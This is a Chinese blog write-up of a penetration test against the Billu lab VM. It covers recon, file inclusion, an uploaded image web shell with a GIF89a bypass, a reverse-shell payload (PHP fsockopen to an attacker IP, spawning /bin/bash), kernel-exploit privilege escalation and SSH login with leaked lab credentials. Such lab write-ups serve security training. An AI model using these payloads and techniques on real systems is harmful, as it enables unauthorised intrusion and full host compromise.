Billu靶场

信息收集

首先使用kali进行存活主机扫描

image-20231108174329233

端口扫描

sudo nmap -sC -sV -p 1-10000 192.168.108.130

image-20231108174441597

发现其开启了22端口 (ssh服务)、80端口(Apache)

使用dirb对其目录进行扫描

dirb http://192.168.108.130 /usr/share/dirb/wordlists/big.txt

image-20231108174637012

漏洞探测

访问扫描出来的页面

先访问首页

image-20231108175044509

构造万能密码

image-20231108175126943

发现没有用

使用sqlmap

image-20231108175250079

看来只能去访问其他目录进行尝试了

in.php

image-20231108175527159

image-20231110204502347

存在文件包含的漏洞

add.php

image-20231108175544852

文件上传页面,但是好像不能被利用

show.php

image-20231108175621836

head.php

image-20231108175739464

test.php

image-20231108175715151

提示file 参数无效,可能事文件包含漏洞,给他一个参数试一下

image-20231108175900843

image-20231108175929646

发现提示仍然错误,说明不是get传参,尝试post传参

image-20231108202050925

image-20231108202102760

看到文件直接可以下载下来

漏洞利用

之前目录扫描出来了一个c文件,直接访问是空白,把c.php作为参数传进去下载下来

image-20231108202409567

应该是数据库的用户名和密码

ica_lab

访问/phpmy

image-20231108202545265

使用c文件中的用户名和密码进行登录

image-20231108202625661

成功进入了数据库管理页面

刚才使用的的数据库是ica_lab,查看三个表

image-20231108202954359

uname pass
biLLu hEx_it

有了账号密码我们可以去登录首页

image-20231108203149888

下载该页面

image-20231110205110868

发现存在文件包含

下拉框选择showusers

image-20231108203236599

选择adduser

image-20231108203245192

该处可以上传图片文件

上传一个php文件,显示只能上传png和jpg

image-20231108203355044

那只能上传图片马了

随便找一张图片,然后写一句话木马,命名为2.asp

image-20231108203750314

image-20231108204007645

进行上传

image-20231108204045673

image-20231108204054467

访问/uploaded_images,可以看到我们上传的文件

image-20231108204150744

使用bp抓包

image-20231108204459325

image-20231108204723802

让他包含图片马试一下

发现包含图片马不成功,但是可以包含到/etc/passwd

image-20231108205315446

发现是图片马的问题,使用1.png/b +1.php /1.png的方法不行,使用GIF89a绕过的方法可以

image-20231109172003988

image-20231109171706679

包含成功

提权

开始反弹shell

load=/uploaded_images/2.jpg&continue=continue&cmd=php+-r+'$sock%3dfsockopen("192.168.108.136",6666)%3bexec("/bin/bash+-i+<%263+>%263+2>%263")%3b'

image-20231109200324001

反弹成功

查看内核版本

image-20231109200613857

image-20231109200644702

在kali下寻找相对应的漏洞

image-20231109200754749

kali开始www服务,靶机下载源码

image-20231109201306740

编译运行

image-20231109201336905

image-20231109201242490

提权成功

第二种思路

靶机还开启ssh服务,如果能利用文件下载或者文件包含得到主机的账户密码就可以直接shh登录了

直接使用dirbuster递归扫描目录

image-20231109111851866

发现了config.inc.php是配置文件

使用文件下载

image-20231108213354029

可以看到用户名和口令分别是root roottoor

我们可以直接ssh登录了

image-20231109104941672

靶场小结

  • 一个靶场可能存在多种渗透思路,不能局限于一种思路,该靶场就可以直接利用ssh。
  • 对于图片木马的制作,可以尝试多种方法,可能一种方法不行,但另一种方法就可以。
  • 要对一些目录或者文件敏感,及时发现配置文件。
posted @ 2025-09-12 21:46  韭菜花也是花  阅读(8)  评论(0)    收藏  举报